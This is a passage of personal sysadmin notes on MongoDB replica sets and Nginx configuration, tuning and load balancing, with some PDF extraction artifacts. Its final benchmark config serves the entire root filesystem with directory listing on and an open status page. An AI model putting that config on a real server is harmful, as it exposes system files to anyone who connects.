˓→STARTUP2 Sun Jul 14 10:18:24.559[rsHealthPoll] replSet member debian:4002 is now in state

˓→ARBITER

Note that for the second node, you specify the arbiterOnly option to create an arbiter. Within a minute, all members should be online myapp:PRIMARY> db.isMaster() { "setName": "myapp", "ismaster" : true, "secondary" : false, "hosts":[ (continues on next page)

35.7. ReplicaSet 233 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) "debian:4000", "debian:4001" ], "arbiters":[ "debian:4002" ], "primary": "debian:4000", "me": "debian:4000", "maxBsonObjectSize": 16777216, "maxMessageSizeBytes": 48000000, "localTime" : ISODate("2013-07-14T07:00:21.925Z"), "ok":1 }

A more detailed view of the system is provided by the rs.status() method. You’ll see state information for each node. Here’s the complete status listing: myapp:PRIMARY> rs.status() { "set": "myapp", "date" : ISODate("2013-07-14T07:07:01Z"), "myState":1, "members":[ { "_id":0, "name": "debian:4000", "health":1, "state":1, "stateStr": "PRIMARY", "uptime": 466, "optime":{ "t": 1373780894, "i":1 }, "optimeDate" : ISODate("2013-07-14T05:48:14Z"), "self": true }, { "_id":1, "name": "debian:4001", "health":1, "state":2, "stateStr": "SECONDARY", "uptime": 458, "optime":{ "t": 1373780894, "i":1 }, "optimeDate" : ISODate("2013-07-

˓→14T05:48:14Z"), "lastHeartbeat" : ISODate("2013-07-

˓→14T07:06:59Z"), "lastHeartbeatRecv" : ISODate("2013-07-

˓→14T07:07:00Z"), "pingMs":0, "syncingTo": "debian:4000" (continues on next page)

234 Chapter 35. MongoDB Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) }, { "_id":2, "name": "debian:4002", "health":1, "state":7, "stateStr": "ARBITER", "uptime": 454, "lastHeartbeat" : ISODate("2013-07-14T07:06:59Z"), "lastHeartbeatRecv" : ISODate("2013-07-14T07:07:01Z

˓→"), "pingMs":0 } ], "ok":1 }

Unless your MongoDB database contains a lot of data, the replica set should come online within 30 seconds. During this time, the stateStr field of each node should transition from RECOVERING to PRIMARY, SECONDARY, or ARBITER.

35.7.4 Cmds use admin db.shutdownServer() db.getReplicationInfo() db.oplog.rs.find().sort({$natural: -1}) http://docs.mongodb.org/manual/core/replica-set-elections/#optime A replica set member cannot become primary unless it has the highest (i.e. most recent) optime of any visible member in the set. http://docs.mongodb.org/manual/reference/glossary/ http://docs.mongodb.org/manual/reference/glossary/#term-strict-consistency A property of a distributed system that allows changes to the system to propagate gradually. In a database system, this means that readable members are not required to reflect the latest writes at all times. In MongoDB, reads to a primary have strict consistency; reads to secondaries have eventual consistency. http://docs.mongodb.org/manual/reference/glossary/#term-eventual-consistency A property of a distributed system requiring that all members always reflect the latest changes to the system. In a database system, this means that any system that can provide data must reflect the latest writes at all times. In MongoDB, reads from a primary have strict consistency; reads from secondary members have eventual consistency. http://docs.mongodb.org/manual/core/replica-set-sync/#validity-and-durability In a replica set, only the primary can accept write operations. Writing only to the primary provides strict consistency among members. Journaling provides single-instance write durability. Without journaling, if a MongoDB instance terminates ungrace- fully, you must assume that the database is in an invalid state.

35.7. ReplicaSet 235 Omid Raha MyStack Documentation, Release 0.1

While applying a batch, MongoDB blocks all reads. As a result, secondaries can never return data that reflects a state that never existed on the primary.

35.8 Locks

35.8.1 Path of mongobd lock

/var/lib/mongodb/mongod.lock

35.9 Forks

35.9.1 tokumx http://www.tokutek.com/products/tokumx-for-mongodb/ http://www.tokutek.com/2013/06/announcing-tokumx-v1-0-tokumongo-you-can-have-it-all-2/ http://www.tokutek.com/2013/07/how-tokumx-gets-great-compression-for-mongodb/

35.10 Tools

35.10.1 mongosniff http://docs.mongodb.org/manual/reference/program/mongosniff/ Use the following command to connect to a mongod or mongos running on port 27017 and 27018 on the localhost interface: mongosniff --source NET lo 27017 27018

Use the following command to only log invalid BSON objects for the mongod or mongos running on the localhost interface and port 27018, for driver development and troubleshooting: mongosniff --objcheck --source NET lo 27018

35.11 Cmds

35.11.1 How can I check the size of a collection?

To view the size of a collection and other information, use the db.collection.stats() method from the mongo shell. The following example issues db.collection.stats() for the orders collection:

db.orders.stats();

To view specific measures of size, use these methods:

236 Chapter 35. MongoDB Omid Raha MyStack Documentation, Release 0.1

db.collection.dataSize() # data size in bytes for the collection. db.collection.storageSize() # allocation size in bytes, including unused

˓→space. db.collection.totalSize() # the data size plus the index size in bytes. db.collection.totalIndexSize() # the index size in bytes.

Also, the following scripts print the statistics for each database and collection:

db._adminCommand("listDatabases").databases.forEach(function (d){mdb= db.

˓→getSiblingDB(d.name); printjson(mdb.stats())})

db._adminCommand("listDatabases").databases.forEach(function (d){mdb= db.

˓→getSiblingDB(d.name); mdb.getCollectionNames().forEach(function(c){s=

˓→mdb[c].stats(); printjson(s)})})

35.11.2 How can I check the size of indexes?

To view the size of the data allocated for an index, use one of the following procedures in the mongo shell: Use the db.collection.stats() method using the index namespace. To retrieve a list of namespaces, issue the following command:

db.system.namespaces.find()

Check the value of indexSizes in the output of the db.collection.stats() command. Example: Issue the following command to retrieve index namespaces:

db.system.namespaces.find()

The command returns a list similar to the following:

{"name": "test.orders"} {"name": "test.system.indexes"} {"name":"test.orders.$_id_"}

View the size of the data allocated for the orders.$_id_ index with the following sequence of operations:

use test db.orders.$_id_.stats().indexSizes

35.12 Monitoring

Tuning Mongodb Performance With MMS

35.12. Monitoring 237 Omid Raha MyStack Documentation, Release 0.1

238 Chapter 35. MongoDB CHAPTER 36

Nginx

Contents:

36.1 Tips

36.1.1 Install Module

$ /etc/nginx/sites-enabled/redmine

36.1.2 Change default welcome page of nginx

$ vim /usr/share/nginx/html/index.html

36.1.3 Nginx with Docker

$ docker pull nginx

Expose Ports: 80 Data Directories: /etc/nginx/nginx.conf https://hub.docker.com/_/nginx/

239 Omid Raha MyStack Documentation, Release 0.1 serve static files

$ docker run --name nx -p8123:80 -v /home/or/ws/dw/nginx.conf:/etc/nginx/nginx.

˓→conf:ro -v /home/or/ws/dw:/usr/share/nginx/html/:ro -d nginx

The nginx.conf file user nginx; worker_processes1; error_log /var/log/nginx/error.log warn; pid /var/run/nginx.pid; events{ worker_connections 1024; } http{

include /etc/nginx/mime.types; default_type application/octet-stream;

log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"';

access_log /var/log/nginx/access.log main;

sendfile on; #tcp_nopush on;

keepalive_timeout 65;

#gzip on;

include /etc/nginx/conf.d/*.conf;

proxy_connect_timeout 600; proxy_send_timeout 600; proxy_read_timeout 600; send_timeout 600; client_max_body_size 10m;

server{ listen 8123; server_name _; location /{ root /usr/share/nginx/html/; } } }

36.1.4 Nginx config file

Nginx Full example file:

240 Chapter 36. Nginx Omid Raha MyStack Documentation, Release 0.1 https://www.nginx.com/resources/wiki/start/topics/examples/full/

36.1.5 Nginx customize error pages server{ ...

# Determines whether proxied responses with codes greater than or equal to 300 # should be passed to a client or be redirected to nginx for processing with the

˓→error_page directive proxy_intercept_errors on;

# 403 error error_page 403 /403.html; location /403.html{ # we assumed `403.html` file is there on this root path: root /absolute/path/to/errors/folder/; # The file is only accessible through internal Nginx redirects (not requestable

˓→directly by clients): internal; }

# 404 error error_page 404 /404.html; location /404.html{ # we assumed `404.html` file is there on this root path: root /absolute/path/to/errors/folder/; internal; }

# 50x errors error_page 500 502 503 504 @error; location @error{ add_header Cache-Control no-cache; # we assumed `error.html` file is there on this root path: root /absolute/path/to/errors/folder/; rewrite ^(.*)$ /error.html break; } } # server block http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_intercept_errors http://nginx.org/en/docs/http/ngx_http_core_module.html#error_page

36.1.6 Nginx maintenance mode server{ ...

location /{ proxy_pass http://web_server;

# we assumed `maintenance` file can touch or remove on this root path: if (-e /absolute/path/to/switch/folder/maintenance){ (continues on next page)

36.1. Tips 241 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) error_page 503 @maintenance; return 503; } }

location @maintenance{ add_header Cache-Control no-cache; root /src/collected_static/errors/; rewrite ^(.*)$ /maintenance.html break; } }

# to switch on to maintenance mode $ touch /absolute/path/to/switch/folder/maintenance # to switch off to maintenance mode $ rm /absolute/path/to/switch/folder/maintenance https://github.com/spesnova/docker-example-nginx/blob/master/files/nginx.conf

36.1.7 How to restrict access to directory and sub directories location /st/{ autoindex off; alias /absolute/path/to/static/folder/ } http://nginx.org/en/docs/http/ngx_http_autoindex_module.html

36.1.8 Enable Nginx Status Page user nginx; worker_processes1; error_log /var/log/nginx/error.log warn; pid /var/run/nginx.pid; events{ } http{

include /etc/nginx/mime.types; default_type application/octet-stream;

log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"';

server{ server_name _; # Server status location= /status{ stub_status on; (continues on next page)

242 Chapter 36. Nginx Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) allow all; } } }

36.1.9 Tuning Nginx

This number should be, at maximum, the number of CPU cores on your system. since nginx doesn’t benefit from more than one worker per CPU. worker_processes auto;

The is a Linux kernel system call, a scalable I/O event notification mechanism, first introduced in Linux kernel 2.5.44. It is meant to replace the older POSIX select and poll system calls, to achieve better performance in more demanding applications, where the number of watched file descriptors is large (unlike the older system calls, which operate in O(n) time, epoll operates in O(1) time). epoll is similar to FreeBSD’s kqueue, in that it operates on a configurable kernel object, exposed to as a file descriptor of its own. We’ll also set nginx to use epoll to ensure we can handle a large number of connections optimally and direct it to accept multiple conncetions at the same time. This option is essential for linux, optimized to serve many clients with each thread use epoll;

Number of file descriptors used for Nginx. This is set in the OS with ulimit -n 200000 or using /etc/ security/limits.conf. worker_rlimit_nofile 200000;

Only log critical errors error_log /var/log/nginx/error.log crit

The author of nginx claims that 10,000 idle connections will use only 2.5 MB of memory, proxy_buffering: This directive controls whether buffering for this context and child contexts is enabled. By default, this is “on”. proxy_buffers: This directive controls the number (first argument) and size (second argument) of buffers for proxied responses. The default is to configure 8 buffers of a size equal to one memory page (either 4k or 8k). Increasing the number of buffers can allow you to buffer more information. proxy_buffer_size: The initial portion of the response from a backend server, which contains headers, is buffered separately from the rest of the response. This directive sets the size of the buffer for this portion of the response. By default, this will be the same size as proxy_buffers, but since this is used for header information, this can usually be set to a lower value. proxy_busy_buffers_size: This directive sets the maximum size of buffers that can be marked “client-ready” and thus busy. While a client can only read the data from one buffer at a time, buffers are placed in a queue to send to the client in bunches. This directive controls the size of the buffer space allowed to be in this state. proxy_max_temp_file_size: This is the maximum size, per request, for a temporary file on disk. These are created when the upstream response is too large to fit into a buffer. proxy_temp_file_write_size: This is the amount of data Nginx will write to the temporary file at one time when the proxied server’s response is too large for the configured buffers.

36.1. Tips 243 Omid Raha MyStack Documentation, Release 0.1 proxy_temp_path: This is the path to the area on disk where Nginx should store any temporary files when the response from the upstream server cannot fit into the configured buffers. As you can see, Nginx provides quite a few different directives to tweak the buffering behavior. Most of the time, you will not have to worry about the majority of these, but it can be useful to adjust some of these values. Probably the most useful to adjust are the proxy_buffers and proxy_buffer_size directives. In contrast, if you have fast clients that you want to immediately serve data to, you can turn buffering off completely. Nginx will actually still use buffers if the upstream is faster than the client, but it will immediately try to flush data to the client instead of waiting for the buffer to pool. If the client is slow, this can cause the upstream connection to remain open until the client can catch up. When buffering is “off” only the buffer defined by the proxy_buffer_size directive will be used http://stackoverflow.com/questions/7325211/tuning-nginx-worker-process-to-obtain-100k-hits-per-min https://rwebs.ca/attempt-at-optimizing-digital-ocean-install-with-loader-io/ https://blog.martinfjordvald.com/2011/04/optimizing-nginx-for-high-traffic-loads/ http://www.freshblurbs.com/blog/2015/11/28/high-load-nginx-config.html https://blog.martinfjordvald.com/2011/04/optimizing-nginx-for-high-traffic-loads/ https://www.digitalocean.com/community/tutorials/understanding-nginx-http-proxying-load-balancing-buffering-and-caching https://www.maxcdn.com/blog/nginx-application-performance-optimization/ https://nelsonslog.wordpress.com/2013/05/19/nginx-proxy-buffering/ worker_connections

Determines how many clients will be served by each worker process. Max clients = worker_connections * worker_processes Max clients is also limited by the number of socket connections available on the system (~64k) worker_connections 1024;

Accept as many connections as possible, after nginx gets notification about a new connection. May flood worker_connections, if that option is set too low. It should be kept in mind that this number includes all connections (e.g. connections with proxied servers, among others), not only connections with clients. Another consideration is that the actual number of simultaneous connections cannot exceed the current limit on the maximum number of open files, which can be changed by worker_rlimit_nofile. multi_accept on;

Since we will likely have a few static assets on the file system like logos, CSS files, Javascript, etc that are going to be commonly used across your site it’s quite a bit faster to have nginx cache these for short periods of time. Adding this outside of the events block tells nginx to cache 1000 files for 30 seconds, excluding any files that haven’t been accessed in 20 seconds, and only files that have 5 times or more. If you aren’t deploying frequently you can safely bump up these numbers higher. Caches information about open FDs, frequently accessed files. Changing this setting, in my environment, brought performance up from 560k req/sec, to 904k req/sec. I recommend using some variant of these options, though not the specific values listed below. open_file_cache max=1000 inactive=20s; open_file_cache_valid 30s; open_file_cache_min_uses5; open_file_cache_errors off;

244 Chapter 36. Nginx Omid Raha MyStack Documentation, Release 0.1

Buffer log writes to speed up IO, or disable them altogether access_log off; #access_log /var/log/nginx/access.log main buffer=16k;

Since we’re now setup to handle lots of connections, we should allow browsers to keep their connections open for awhile so they don’t have to reconnect to as often. This is controlled by the keepalive_timeout setting. We’re also going to turn on sendfile support, tcp_nopush, and tcp_nodelay. sendfile optimizes serving static files from the file system, like your logo. The other two optimize nginx’s use of TCP for headers and small bursts of traffic for things like Socket IO or frequent REST calls back to your site. Sendfile copies data between one FD and other from within the kernel. More efficient than read() + write(), since the requires transferring data to and from the user space. sendfile on;

The Tcp_nopush causes nginx to attempt to send its HTTP response head in one packet, instead of using partial frames. This is useful for prepending headers before calling sendfile, or for throughput optimization. tcp_nopush on; don’t buffer data-sends (disable Nagle algorithm). Good for sending frequent small bursts of data in real time. tcp_nodelay on;

Timeout for keep-alive connections. Server will close connections after this time. keepalive_timeout 15;

# Number of requests a client can make over the keep-alive connection. This is set high for testing. keepalive_requests 100000;

Allow the server to close the connection after a client stops responding. Frees up socket-associated memory. reset_timedout_connection on;

Send the client a “request timed out” if the body is not loaded by this time. Default 60. client_body_timeout 10;

If the client stops reading data, free up the stale client connection after this much time. Default 60. send_timeout2; nearly every browser on earth supports receiving compressed content so we definitely want to turn that on. These also go in the same http section as above: Compression. Reduces the amount of data that needs to be transferred over the network gzip on; gzip_min_length 1000; gzip_types text/plain text/css text/xml text/javascript application/json application/

˓→x-javascript application/xml application/xml+rss; gzip_proxied expired no-cache no-store private auth; gzip_disable "MSIE [1-6]\.";

36.1. Tips 245 Omid Raha MyStack Documentation, Release 0.1

One of the first things that many people try to do is to enable the gzip compression module available with nginx. The intention here is that the objects which the server sends to requesting clients will be smaller, and thus faster to send. However this involves the trade-off common to tuning, performing the compression takes CPU resources from your server, which frequently means that you’d be better off not enabling it at all. Generally the best approach with compression is to only enable it for large files, and to avoid compressing things that are unlikely to be reduced in size (such as images, executables, and similar binary files). With that in mind the following is a sensible configuration: gzip on; gzip_vary on; gzip_min_length 10240; gzip_proxied expired no-cache no-store private auth; gzip_types text/plain text/css text/xml text/javascript application/x-javascript

˓→application/xml; gzip_disable "MSIE [1-6]\.";

This enables compression for files that are over 10k, aren’t being requested by early versions of Microsoft’s , and only attempts to compress text-based files. https://tweaked.io/guide/nginx/ proxy_buffering is turned on by default with nginx, so we just need to bump up the sizes of these buffers. The first directive, proxy_buffers, is telling nginx to create and use 8 24k buffers for the response from the proxy. The second directive is a special smaller buffer that will just contain the HEAD information, so it’s safe to make that smaller. So what’s this do? Well when you’re proxying a connection nginx is playing the middle man between the browser and your WSGI process. As the WSGI process writes data back to to nginx, nginx stores this in a buffer and writes out to the client browser when the buffer is full. If we leave these at the defaults nginx provides (8 buffers of either 4 or 8K depending on system), what ends up happening is our big 50-200K of HTML markup is spoon fed to nginx in small 4K bites and then sent out to the browser. This is sub-optimal for most sites. What we want to have happen is for our WSGI process to finish and move on to the next request as fast as possible. To do this it needs nginx to slurp up all of the output quickly. Increasing the buffer sizes to be larger than most (or all) of the markup size of your apps pages let’s this happen. location /{ proxy_buffers8 24k; proxy_buffer_size 2k; proxy_pass http://127.0.0.1:8000; } http://www.revsys.com/12days/nginx-tuning/ http://dak1n1.com/blog/12-nginx-performance-tuning/

How to Optimize NGINX to Handle 100+K Requests per Minute http://tecadmin.net/optimize-nginx-to-handle-100k-requests-per-minute/

36.1.10 Load testing

Load and Stress Testing as “Load testing is the process of putting demand on a system or device and measuring its response. Stress testing refers to tests that determine the robustness of software by testing beyond the limits of normal operation”. https://en.wikipedia.org/wiki/Load_testing

246 Chapter 36. Nginx Omid Raha MyStack Documentation, Release 0.1 https://en.wikipedia.org/wiki/Stress_testing_%28software%29 http://www.devcurry.com/2010/07/10-free-tools-to-loadstress-test-your.html http://dak1n1.com/blog/14-http-load-generate/ https://luoluca.wordpress.com/2015/05/24/docker-up-distributed-load-testing-with-tsung/

36.1.11 JMeter https://www.digitalocean.com/community/tutorials/how-to-use-jmeter-to-record-test-scenarios https://gist.github.com/hhcordero/abd1dcaf6654cfe51d0b http://srivaths.blogspot.com/2014/08/distrubuted-jmeter-testing-using-docker.html https://github.com/hauptmedia/docker-jmeter https://docs.google.com/presentation/d/1Yi5C27C3Q0AnT-uw9SRnMeEqXSKLQ8h9O9Jqo1gQiyI/edit?pref=2& pli=1#slide=id.g2a7b2c954_016 https://www.digitalocean.com/community/tutorial_series/load-testing-with-apache-jmeter https://www.digitalocean.com/community/tutorials/how-to-use-apache-jmeter-to-perform-load-testing-on-a-web-server

36.1.12 Linux TCP/IP tuning for scalability

Concurrent User Connections If your implementation is creating a large number of concurrent user connections to backend application servers , it is important to verify that there are enough local port numbers available for outbound connections to the backend application. Verification of the server port range can be done using the following command:

$ sysctl net.ipv4.ip_local_port_range

If the range needs to be increased, that can be done using the following command:

$ sudo sysctl -w net.ipv4.ip_local_port_range="1024 64000" http://www.lognormal.com/blog/2012/09/27/linux-tcpip-tuning/ http://stackoverflow.com/questions/1575453/how-many-socket-connections-can-a-web-server-handle

36.1.13 What is a Reverse Proxy vs. Load Balancer?

A reverse proxy accepts a request from a client, forwards it to a server that can fulfill it, and returns the server’s response to the client. A load balancer distributes incoming client requests among a group of servers, in each case returning the response from the selected server to the appropriate client.

Load Balancing

Load balancers are most commonly deployed when a site needs multiple servers because the volume of requests is too much for a single server to handle efficiently. Deploying multiple servers also eliminates a single point of failure, making the website more reliable. Most commonly, the servers all host the same content, and the load balancer’s job is to distribute the workload in a way that makes the best use of each server’s capacity, prevents overload on any server, and results in the fastest possible response to the client.

36.1. Tips 247 Omid Raha MyStack Documentation, Release 0.1

A load balancer can also enhance the user experience by reducing the number of error responses the client sees. It does this by detecting when servers go down, and diverting requests away from them to the other servers in the group. In the simplest implementation, the load balancer detects server health by intercepting error responses to regular requests. Application health checks are a more flexible and sophisticated method in which the load balancer sends separate health-check requests and requires a specified type of response to consider the server healthy. Another useful function provided by some load balancers is session persistence, which means sending all requests from a particular client to the same server. Even though HTTP is stateless in theory, many applications must store state information just to provide their core functionality – think of the shopping basket on an e-commerce site. Such applications underperform or can even fail in a load-balanced environment, if the load balancer distributes requests in a user session to different servers instead of directing them all to the server that responded to the initial request.

Nginx with dynamic upstreams https://tenzer.dk/nginx-with-dynamic-upstreams/ https://www.nginx.com/products/on-the-fly-reconfiguration/ https://github.com/GUI/nginx-upstream-dynamic-servers https://github.com/cubicdaiya/ngx_dynamic_upstream http://serverfault.com/questions/374643/nginx-dynamic-upstream-configuration-routing https://github.com/Mashape/kong/issues/1129 https://news.ycombinator.com/item?id=9950715 https://github.com/bobrik/zoidberg-nginx https://github.com/bobrik/zoidberg https://github.com/openresty/lua-resty-dns https://github.com/spro/simon

Reverse Proxy

Whereas deploying a load balancer makes sense only when you have multiple servers, it often makes sense to deploy a reverse proxy even with just one web server or application server. You can think of the reverse proxy as a website’s “public face.” Its address is the one advertised for the website, and it sits at the edge of the site’s network to accept requests from web browsers and mobile apps for the content hosted at the website. The benefits are two-fold: Increased security No information about your backend servers is visible outside your internal network, so malicious clients cannot access them directly to exploit any vulnerabilities. Many reverse proxy servers include features that help protect backend servers from distributed denial-of-service (DDoS) attacks, for example by rejecting traffic from particular client IP addresses (blacklisting), or limiting the number of connections accepted from each client. Increased scalability and flexibility Because clients see only the reverse proxy’s IP address, you are free to change the configuration of your backend infrastructure. This is particularly useful In a load-balanced environment, where you can scale the number of servers up and down to match fluctuations in traffic volume. Another reason to deploy a reverse proxy is for web acceleration – reducing the time it takes to generate a response and return it to the client. Techniques for web acceleration include the following:

248 Chapter 36. Nginx Omid Raha MyStack Documentation, Release 0.1

Compression Compressing server responses before returning them to the client (for instance, with gzip) reduces the amount of bandwidth they require, which speeds their transit over the network. SSL termination Encrypting the traffic between clients and servers protects it as it crosses a public network like the Internet. But decryption and encryption can be computationally expensive. By decrypting incoming requests and encrypting server responses, the reverse proxy frees up resources on backend servers which they can then devote to their main purpose, serving content. Caching Before returning the backend server’s response to the client, the reverse proxy stores a copy of it locally. When the client (or any client) makes the same request, the reverse proxy can provide the response itself from the cache instead of forwarding the request to the backend server. This both decreases response time to the client and reduces the load on the backend server. https://www.nginx.com/resources/glossary/reverse-proxy-vs-load-balancer/

36.1.14 Load balancing haproxy and nginx

Understanding Load Balancing Load Balancing, otherwise known as fault-tolerant proxying, helps to disseminate requests going into one domain across multiple web servers, where they access the stored data requested by clients. The main objective of load balancing is to avoid having a single point of failure so that no part of the machine is important enough that if it fails the system will crash. HAproxy was built to alleviate these concerns as a fast, reliable and free load balancer proxy for TCP and HTTP based applications. It is written in C programming language with a single-process, event-driven mode that was designed to reduce the cost of context switch and memory usage. Other systems that use pre-forked or threaded servers use more memory, but HAproxy can process several hundreds of tasks in as fast as a millisecond. Modes—TCP vs. HTTP What makes HAproxy so efficient as a load balancer is its ability to perform Layer 4 load balancing. In TCP mode, all user traffic will be forwarded based on IP range and port. The user accesses the load balancer, which will forward the request to the backend servers. The backend server that is selected will then respond directly to the user, which streamlines the process. The other form of load balancing is Layer 7, or HTTP load balancing, which forwards the requests to different back- end servers based on the content of the user’s request. This mode is more commonly used when running multiple application servers under the same domain and port, because it searches the content of the package in order to sort the request. While HTTP mode is good for sorting, TCP mode is ideal for speed since it doesn’t have to open the package to sort the requests. Unlike a lot of other load balancers, HAproxy is unique because it has both options built in.

Nginx HAproxy Full Web Server Only Load Balancer Complicated, Slower Faster Works with Windows Only Open Source No Admin Console Admin Console Only HTTP Layer 7 TCP (Layer 4) HTTP (Layer 7) Good Caching Advanced Routing and Load Balancing Native SSL Native SSL

HAProxy is really just a load balancer/reverse proxy. Nginx is a Webserver that can also function as a reverse proxy.

36.1. Tips 249 Omid Raha MyStack Documentation, Release 0.1

Here are some differences: HAProxy: Does TCP as well as HTTP proxying (SSL added from 1.5-dev12) More rate limiting options The author answers questions here on Server Fault ;-) Nginx: Supports SSL directly Is also a caching server At Stack Overflow we mainly use HAProxy with nginx for SSL offloading so HAProxy is my recommendation. If needed only for load balancing HA proxy is better. But combining both nginix and HA proxy can be more useful, as nginix is fast in providing static content, it will serve all request for static data and then send all request to HA proxy which serve as load balancer and send request to web server to serve request by balancing load. HaProxy is the best opensource loadbalancer on the market. Varnish is the best opensource static file cacher on the market. Nginx is the best opensource webserver on the market. (of course this is my and many other peoples opinion) But generally.. not all queries go through the entire stack.. Everything goes through haproxy and nginx/multiple nginx’s. The only difference is you “bolt” on varnish for static requests.. any request is loadbalanced for redundancy and throughput ( good, thats scalable redundancy ) any request for static files is first hitting the varnish cache ( good, thats fast ) any dynamic request goes direct to the backend ( great, varnish doesnt get used) Overall, this model fits a scalable and growing architecture ( take haproxy out, if you dont have multiple servers ) Hope this helps :D Note: I actually also introduce Pound for SSL queries aswell :D You can have a server dedicated to decrypting SSL requests, and passing out standard requests to the backend stack :D (It makes the whole stack run quicker and simpler ) Nginx A full web server, other features can also be used. Eg: HTTP Compression SSL Support Very light weight as Nginx was designed to be light from the start. Near Varnish caching performance Close to HAProxy load balancing performance Varnish best for complex caching scenarios and incorporating with the applications. best static file cacher No SSL Support Memory and CPU eater Haproxy best loadbalancer, for cutting edge load balancing features, comparable to hardware loadbalancers SSL is supported since 1.5.0 Simpler, being just a tcp proxy without an http implementation, which makes it faster and less bug prone. http://serverfault.com/questions/293501/should-nginx-be-at-the-front-of-haproxy-or-opposite https://www.quora.com/Does-it-make-sense-to-put-Nginx-in-front-of-HAProxy https://www.bizety.com/2016/01/27/haproxy-load-balancing-primer/ https://www.digitalocean.com/community/tutorials/how-to-create-a-high-availability-haproxy-setup-with-corosync-pacemaker-and-floating-ips-on-ubuntu-14-04 https://youtu.be/MKgJeqF1DHw https://www.bizety.com/2016/01/27/haproxy-load-balancing-primer/

250 Chapter 36. Nginx Omid Raha MyStack Documentation, Release 0.1 http://serverfault.com/questions/229945/what-are-the-differences-between-haproxy-and-ngnix-in-reverse-proxy-mode http://serverfault.com/questions/204025/ordering-1-nginx-2-varnish-3-haproxy-4-webserver http://nickcraver.com/blog/2016/02/17/stack-overflow-the-architecture-2016-edition/

36.1.15 Nginx vs Varnish

Varnish is a accelerator. You install it in front of your web application and it will speed it up signifi- cantly. Varnish stores data in virtual memory and leaves the task of deciding what is stored in memory and what gets paged out to disk to the operating system. This helps avoid the situation where the operating system starts caching data while they are moved to disk by the application. Varnish is more advanced in terms of caching because Varnish caches whatever you tell it to cache. It can cache just the PHP output, just the static files, both, or neither. It’s a very powerful tool. But Nginx is more suitable as a web server. I’m a fan of haproxy -> Varnish -> app server which we use heavily in our stack. haproxy provides ssl termination, websockets, and generally acts as a content router. Varnish is a caching reverse proxy which protects the app, handles TTL on content, etc. Lastly the app. It’s a little complex, but the flexibility is amazing. https://www.scalescale.com/tips/nginx/nginx-vs-varnish/ https://www.narga.net/varnish-nginx-comparison-nginx-alone-better/?PageSpeed=noscript https://www.reddit.com/r/devops/comments/3d9tw6/should_there_be_only_1_reverse_proxy_nginx_or/

36.1.16 An Introduction to HAProxy and Load Balancing Concepts https://www.digitalocean.com/community/tutorials/an-introduction-to-haproxy-and-load-balancing-concepts

36.1.17 Redundant load balancers?

The point where the redundancy may fail is the load balancer itself. If you do not make that component redundant, the load balancer will become the single point of failure. HA of a Load Balancer An NGINX Plus HA cluster uses VRRP to manage a floating virtual IP address, ensuring that the IP address is always available and traffic is not dropped The NGINX Plus high-availability solution is based on keepalived, which itself uses an implementation of the Virtual Router Redundancy Protocol (VRRP). After you install the nginx-ha-keepalived package and configure keepalived, it runs as a separate process on each NGINX instance in the cluster and manages a shared virtual IP address. The virtual IP address is the IP address advertised to downstream clients, for example via a DNS record for your service. Based on initial configuration, keepalived designates one NGINX instance as master and assigns the virtual IP address to it. The master periodically verifies that keepalived and NGINX Plus are both running, and sends VRRP advertise- ment messages at regular intervals to let the backup instance know it’s healthy. If the backup doesn’t receive three consecutive advertisements, it becomes the new master and takes over the virtual IP address. https://en.wikipedia.org/wiki/Virtual_Router_Redundancy_Protocol http://serverfault.com/questions/686878/how-to-make-redundant-load-balancers http://d0.awsstatic.com/whitepapers/AWS_NGINX_Plus-whitepaper-final_v4.pdf https://www.nginx.com/products/high-availability/ https://www.nginx.com/resources/admin-guide/nginx-ha-keepalived/

36.1. Tips 251 Omid Raha MyStack Documentation, Release 0.1

How To Set Up Highly Available Web Servers with Keepalived and Floating IPs on Ubuntu 14.04 https://www.digitalocean.com/community/tutorials/how-to-set-up-highly-available-web-servers-with-keepalived-and-floating-ips-on-ubuntu-14-04

How To Set Up Highly Available HAProxy Servers with Keepalived and Floating IPs on Ubuntu 14.04 https://www.digitalocean.com/community/tutorials/how-to-set-up-highly-available-haproxy-servers-with-keepalived-and-floating-ips-on-ubuntu-14-04

36.1.18 nginx automatic failover load balancing http://serverfault.com/questions/140990/nginx-automatic-failover-load-balancing

36.1.19 Building a Load Balancer with LVS - Linux Virtual Server http://kaivanov.blogspot.com/2013/01/building-load-balancer-with-lvs-linux.html

36.1.20 Building A Highly Available Nginx Reverse-Proxy Using Heartbeat http://opensourceforu.com/2009/03/building-a-highly-available-nginx-reverse-proxy-using-heartbeat/

36.1.21 Building a Highly-Available Load Balancer with Nginx and Keepalived on CentOS http://www.tokiwinter.com/building-a-highly-available-load-balancer-with-nginx-and-keepalived-on-centos/

36.1.22 HAProxy as a static reverse proxy for Docker containers http://oskarhane.com/haproxy-as-a-static-reverse-proxy-for-docker-containers/

36.1.23 How to setup HAProxy as Load Balancer for Nginx on CentOS 7 https://www.howtoforge.com/tutorial/how-to-setup-haproxy-as-load-balancer-for-nginx-on-centos-7/

36.1.24 Building a Load-Balancing Cluster with LVS http://dak1n1.com/blog/13-load-balancing-lvs/

36.1.25 Doing Some local benchmark with Nginx user nginx; worker_processes1; worker_rlimit_nofile= 5000 error_log /var/log/nginx/error.log warn; pid /var/run/nginx.pid;

(continues on next page)

252 Chapter 36. Nginx Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) events{ worker_connections 2048; use epoll; multi_accept on; accept_mutex on; } http{ include /etc/nginx/mime.types; default_type application/octet-stream;

log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"';

# access_log /var/log/nginx/access.log main; access_log off;

sendfile on; #tcp_nopush on;

keepalive_timeout 15;

#gzip on;

include /etc/nginx/conf.d/*.conf;

server{ server_name _; charset utf-8; client_max_body_size 50M; proxy_intercept_errors on;

location /{ autoindex on; alias/; }

# Server status location= /status{ stub_status on; allow all; }

}

}

$ docker run --rm -p 80:80 -v ~/workspace/nginx/nginx.conf:/etc/nginx/nginx.conf:ro

